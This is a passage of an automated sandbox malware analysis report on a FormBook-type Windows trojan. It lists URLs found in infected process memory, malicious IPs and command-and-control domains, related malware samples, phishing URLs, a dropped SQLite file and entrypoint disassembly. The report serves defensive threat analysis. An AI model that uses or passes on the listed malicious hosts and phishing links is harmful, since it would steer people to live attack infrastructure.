                                                                                                                      		high
                                                                                                                      https://www.atom.com/winnersmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://helpdesk.atom.com/squadhelp-services/trademark-filing-packagemshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.atom.com/managed-conteststIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.ecosia.org/newtab/mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.tmstore.click/qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FPmshta.exe, 00000003.00000002.3916202013.0000000004CC2000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.0000000003D42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://www.atom.com/assets/images/atom-favicon.pngmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.atom.com/testimonials-feedbackmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.amitayush.digital/5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2Amzmshta.exe, 00000003.00000002.3916202013.000000000562E000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.00000000046AE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://ac.ecosia.org/autocomplete?q=mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.atom.com/premium-domains-for-sale/all/length/5%20Lettersmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.atom.com/audience-testingmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.atom.com/how-it-worksmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.atom.com/assets/imgs/domainwall.jpgmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.atom.com/brand-alignmentmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.atom.com/startupsmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.atom.com/youtube-name-generatormshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://iframe.mediadelivery.net/embed/239474/327efcdd-b1a2-4891-b274-974787ae8362?autoplay=false&ammshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.atom.com/start-contestmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.atom.com/branding-marketing-naming-contests/allmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.atom.com/our-workmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		high

                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public IPs

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            217.160.0.231
                                                                                                                                                            		www.coffee-and-blends.infoGermany
                                                                                                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                            52.20.84.62
                                                                                                                                                            		www.luxe.guruUnited States
                                                                                                                                                            		14618AMAZON-AESUStrue
                                                                                                                                                            35.156.117.131
                                                                                                                                                            		www.specialgift.asia.s.strikinglydns.comUnited States
                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                            156.226.22.233
                                                                                                                                                            		www.nad5.shopSeychelles
                                                                                                                                                            		132813AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKtrue
                                                                                                                                                            142.250.185.179
                                                                                                                                                            		ghs.googlehosted.comUnited States
                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                            206.119.82.134
                                                                                                                                                            		40wxd.topUnited States
                                                                                                                                                            		174COGENT-174UStrue
                                                                                                                                                            54.179.173.60
                                                                                                                                                            		dns.ladipage.comUnited States
                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                            162.213.249.216
                                                                                                                                                            		www.vasehub.xyzUnited States
                                                                                                                                                            		22612NAMECHEAP-NETUStrue
                                                                                                                                                            3.33.130.190
                                                                                                                                                            		softillery.infoUnited States
                                                                                                                                                            		8987AMAZONEXPANSIONGBtrue
                                                                                                                                                            172.81.61.224
                                                                                                                                                            		www.moritynomxd.xyzUnited States
                                                                                                                                                            		22552ESITEDUStrue

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                            Analysis ID:1554612
                                                                                                                                                            Start date and time:2024-11-12 18:32:10 +01:00
                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 9m 57s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                            Number of analysed new started processes analysed:9
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:2
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Sample name:wavjjT3sEq.exe
                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                            Original Sample Name:18623fe8fe11f35ef12ba7fd911a10b4f3b082e0a816849a6891cf2c9ece9f62.exe
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@5/1@16/10
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 66.7%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 88%
                                                                                                                                                            • Number of executed functions: 14
                                                                                                                                                            • Number of non-executed functions: 327
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                            Warnings

                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                            • VT rate limit hit for: wavjjT3sEq.exe

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            12:34:04API Interceptor9609099x Sleep call for process: mshta.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            217.160.0.231Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                            • www.coffee-and-blends.info/jp2s/
                                                                                                                                                            NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.coffee-and-blends.info/fhdl/
                                                                                                                                                            PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.coffee-and-blends.info/bhth/
                                                                                                                                                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.coffee-and-blends.info/bhth/
                                                                                                                                                            52.20.84.62gTg6xY6fo2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.fourier.tech/t6xo/
                                                                                                                                                            proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.seraph.best/qfwu/
                                                                                                                                                            SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.seraph.best/dse0/
                                                                                                                                                            wODub61gZe.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.luxe.guru/zdib/
                                                                                                                                                            Order SO311180.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.seraph.best/qfwu/
                                                                                                                                                            Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                            • www.luxe.guru/esft/
                                                                                                                                                            http://fortcollinsfineart.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • fortcollinsfineart.com/
                                                                                                                                                            T9W7MCS2HI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.luxe.guru/s9un/
                                                                                                                                                            UPDATED Q-LOT24038.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.luxe.guru/s9un/
                                                                                                                                                            PO S-TECHAccolle654657659768774876980.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • www.rezzla.com/n5i5/
                                                                                                                                                            35.156.117.131jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.specialgift.asia/5x7s/
                                                                                                                                                            http://www.unityonesecurlty.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • www.unityonesecurlty.com/
                                                                                                                                                            payment copy.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.desradicalize.com/fa0s/?rp-XJd=yaiD4CrQBqQk3f6bY8AcjSFvE0d0FeRyEQO7Tb7KR4+cspDv2ZhT1e5uTwRJ5I3i91xDLw==&X2Jd-=a0D0YRy8U2Gt
                                                                                                                                                            s8b4XYptUi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.pushaoeel-kouhu-bunan7266.com/m07f/?_H=x2d5fJPkcmwjJQD8/aoiU8RP+XDANfw3Yy1Dy/UxKWzII5azeJQ7Z0gd+jhTqVNgTfno&qPzl7=-Zo4sR
                                                                                                                                                            bm6sl8vbG7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.ddshop.online/benx/?uVY=CpIPBPe0Fzl4eL8&G8ahUZ=DxfSjoAnqGLwaGS8X0xeKLmgb9UiOHyg6lv1L2gURlVw/mIxU5OP2fq4M2A1SurxVLKy
                                                                                                                                                            invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.jinlan.online/e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            www.moritynomxd.xyzUNGSno5k4G.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 172.81.61.224
                                                                                                                                                            PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 172.81.61.224
                                                                                                                                                            Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                            • 172.81.61.224
                                                                                                                                                            POPO00003964.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 172.81.61.224
                                                                                                                                                            YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 172.81.61.224
                                                                                                                                                            Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 172.81.61.224
                                                                                                                                                            List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 172.81.61.224
                                                                                                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 172.81.61.224
                                                                                                                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 172.81.61.224
                                                                                                                                                            www.vasehub.xyz0CkEHZjZgO.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 162.213.249.216
                                                                                                                                                            Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                            • 162.213.249.216

                                                                                                                                                            ASNs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            AMAZON-AESUShttps://welsfargo.com-onlinebanking.com/Xb1ExYUR6VXl0bGxmVDdXaVpyTzlKZUtudEIxbGsxOGY1VzhSNFZvZVlFTDk5T0c2Q25PS3hwcEYrL1dZdG8vVzZIUS9mVHczWklvQ1R0U1ZXaVN0L2RuN0VIbklqdzFUWVROV3E4ZnVldDhWUmZ3RDRZWmFKY0ZJOUlTWWlqWHVxNDlVTUYxYVFDQ1dBWTd0bzVKbGIrL25HZVVOTHNSMnNBcGJuaVRrZW82VHY3RVlnYThxbUpLN2lBPT0tLTRmTmYwUzZkLzlIS1VWQ2otLVNXQlpnWjRKZDUxaGNXQmpCWksyN3c9PQ==?cid=2251351141Get hashmaliciousKnowBe4Browse
                                                                                                                                                            • 52.5.144.111
                                                                                                                                                            scan3762399_arleen@wcctxlaw.com.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 52.5.13.197
                                                                                                                                                            specifications and technical requirements.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 23.22.254.206
                                                                                                                                                            https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                            • 52.21.71.129
                                                                                                                                                            https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                            • 100.29.46.154
                                                                                                                                                            https://webconference.protected-forms.com/XaGFyNXNiVFNRd1VaOFBwaER2WW5KM1V1S1NLSzZZZDhjN3NKVC9oV2lCRlNRWmVpbVlYY0JzbS81VUd0czRzOHNRWWNGSndpSCtxMm15d3h6SnFIS0VpR2NHcHh2MWo5Nm1wM3lROHdlakpZdnVWYUpHZDJ2LzVyV1ljWjZuK2pHcTByTjRWRm1IRnpPSnVmUFI0TVk2dHN5L1Yxdko0Y01WeHZYck1iM2tvc3l4YVdqSlZabWl2Y0ZwLzQtLVZvU05jS1M1U0FEQjZZeHUtLUw3WXM4dkFWa2t2YTRLMXJEYTRIbGc9PQ==?cid=2270944670Get hashmaliciousKnowBe4Browse
                                                                                                                                                            • 52.205.64.62
                                                                                                                                                            https://cx.surveysensum.com/d6xqqwvxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 3.85.221.5
                                                                                                                                                            https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                            • 3.232.60.224
                                                                                                                                                            botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                            • 54.242.111.200
                                                                                                                                                            sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 54.54.84.32
                                                                                                                                                            ONEANDONE-ASBrauerstrasse48DEArrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 217.160.0.60
                                                                                                                                                            mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                                                                                                                            • 87.106.46.107
                                                                                                                                                            75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                                                                                                            • 87.106.46.107
                                                                                                                                                            New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 217.160.0.220
                                                                                                                                                            Digiturk.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 217.160.0.3
                                                                                                                                                            hiss.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 217.160.158.130
                                                                                                                                                            AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 217.160.0.60
                                                                                                                                                            xxTupY4Fr3.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 217.160.0.236
                                                                                                                                                            https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 212.227.67.33
                                                                                                                                                            https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 212.227.67.34
                                                                                                                                                            AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKOrder.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                            • 156.226.22.233
                                                                                                                                                            8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 156.226.22.233
                                                                                                                                                            notificacion_de_credito__PDF__.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 156.226.22.233
                                                                                                                                                            RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 156.226.22.233
                                                                                                                                                            INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 156.226.22.233
                                                                                                                                                            September Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 156.226.22.233
                                                                                                                                                            Tomcat.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 216.250.106.146
                                                                                                                                                            b4cbf3ffbd8e152116e72487c3b16f1d.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 216.250.106.146
                                                                                                                                                            Tomcat.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 216.250.106.146
                                                                                                                                                            b4cbf3ffbd8e152116e72487c3b16f1d.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 216.250.106.146
                                                                                                                                                            AMAZON-02UShttp://jackelec.com.au/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 52.77.158.64
                                                                                                                                                            https://welsfargo.com-onlinebanking.com/Xb1ExYUR6VXl0bGxmVDdXaVpyTzlKZUtudEIxbGsxOGY1VzhSNFZvZVlFTDk5T0c2Q25PS3hwcEYrL1dZdG8vVzZIUS9mVHczWklvQ1R0U1ZXaVN0L2RuN0VIbklqdzFUWVROV3E4ZnVldDhWUmZ3RDRZWmFKY0ZJOUlTWWlqWHVxNDlVTUYxYVFDQ1dBWTd0bzVKbGIrL25HZVVOTHNSMnNBcGJuaVRrZW82VHY3RVlnYThxbUpLN2lBPT0tLTRmTmYwUzZkLzlIS1VWQ2otLVNXQlpnWjRKZDUxaGNXQmpCWksyN3c9PQ==?cid=2251351141Get hashmaliciousKnowBe4Browse
                                                                                                                                                            • 52.217.224.48
                                                                                                                                                            http://iposeidonbussiness.com/img/event_egghunt2.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 52.15.180.19
                                                                                                                                                            https://oqumcrpv8e.beefreecontent.comGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 108.138.26.51
                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                            • 108.156.211.59
                                                                                                                                                            https://ampa.fi/uEvMZCXCvXGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 18.245.31.5
                                                                                                                                                            ACHAT DE 2 IMMEUBLES.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 18.155.173.98
                                                                                                                                                            linux_x64_agent_no_crypt.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 54.171.230.55
                                                                                                                                                            https://www.google.com/url?q=https%3A%2F%2Ftrimmer.to%2FPlfGc&sa=D&sntz=1&usg=AOvVaw1DTVuO2H6PM4yLoWCUd_D9Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 3.75.10.80
                                                                                                                                                            https://t.ly/Bv1rGGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                            • 18.245.31.5

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            No context

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1863I7301

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):196608
                                                                                                                                                            Entropy (8bit):1.1209886597424439
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Entropy (8bit):7.965631325753328
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.98%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            File name:wavjjT3sEq.exe
                                                                                                                                                            File size:289'280 bytes
                                                                                                                                                            MD5:ea8d328ba326e4f6c37f0d853f981122
                                                                                                                                                            SHA1:6fdba2e03847634b20f105d0a3ff29348701c8c8
                                                                                                                                                            SHA256:18623fe8fe11f35ef12ba7fd911a10b4f3b082e0a816849a6891cf2c9ece9f62
                                                                                                                                                            SHA512:c0d6618eebe3bb6ae18c3531087c64e803c7f30ae620d0a30730ed8d015cae2158b3e27d637519f17d79baa345ce58de7401369c29f2379120ac1b03dc3362fe
                                                                                                                                                            SSDEEP:6144:pteV3JfK3fizH4v+81KxX008jZ10wEEnBYILn:r3GHG2rCRB
                                                                                                                                                            TLSH:C2542368734A18F3E69F5B75695B2AB588901A0F3FE5030A872E1523A3F42BC1F6CD45
                                                                                                                                                            File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L...(..V.................X...................p....@................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x401480
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x56B99B28 [Tue Feb 9 07:54:16 2016 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:6
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:6
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:

                                                                                                                                                            Entrypoint Preview

                                                                                                                                                            Instruction
                                                                                                                                                            push ebp
                                                                                                                                                            mov ebp, esp
                                                                                                                                                            sub esp, 00000420h
                                                                                                                                                            push ebx
                                                                                                                                                            push esi
                                                                                                                                                            push edi
                                                                                                                                                            push 00000400h
                                                                                                                                                            lea eax, dword ptr [ebp-0000041Ch]
                                                                                                                                                            push 00000000h
                                                                                                                                                            push eax
                                                                                                                                                            mov dword ptr [ebp-00000420h], 00000000h
                                                                                                                                                            call 00007F4650C32A4Ch
                                                                                                                                                            add esp, 0Ch
                                                                                                                                                            xor ebx, ebx
                                                                                                                                                            mov ecx, 00002A93h
                                                                                                                                                            mov dword ptr [ebp-14h], ebx
                                                                                                                                                            mov dword ptr [ebp-10h], ebx
                                                                                                                                                            mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                            mov dword ptr [ebp-08h], 00005AC6h
                                                                                                                                                            mov dword ptr [ebp-0Ch], 00004C02h
                                                                                                                                                            mov dword ptr [ebp-04h], 00004A61h
                                                                                                                                                            mov dword ptr [ebp-18h], 00004F8Eh
                                                                                                                                                            jmp 00007F4650C30E48h
                                                                                                                                                            lea ebx, dword ptr [ebx+00000000h]
                                                                                                                                                            mov eax, 964FDA6Dh
                                                                                                                                                            imul ecx
                                                                                                                                                            add edx, ecx
                                                                                                                                                            sar edx, 06h
                                                                                                                                                            mov ecx, edx
                                                                                                                                                            shr ecx, 1Fh
                                                                                                                                                            add ecx, edx
                                                                                                                                                            jne 00007F4650C30E2Dh
                                                                                                                                                            mov ecx, 00004AACh
                                                                                                                                                            lea ebx, dword ptr [ebx+00000000h]
                                                                                                                                                            mov eax, 964FDA6Dh
                                                                                                                                                            imul ecx
                                                                                                                                                            add edx, ecx
                                                                                                                                                            sar edx, 07h
                                                                                                                                                            mov ecx, edx
                                                                                                                                                            shr ecx, 1Fh
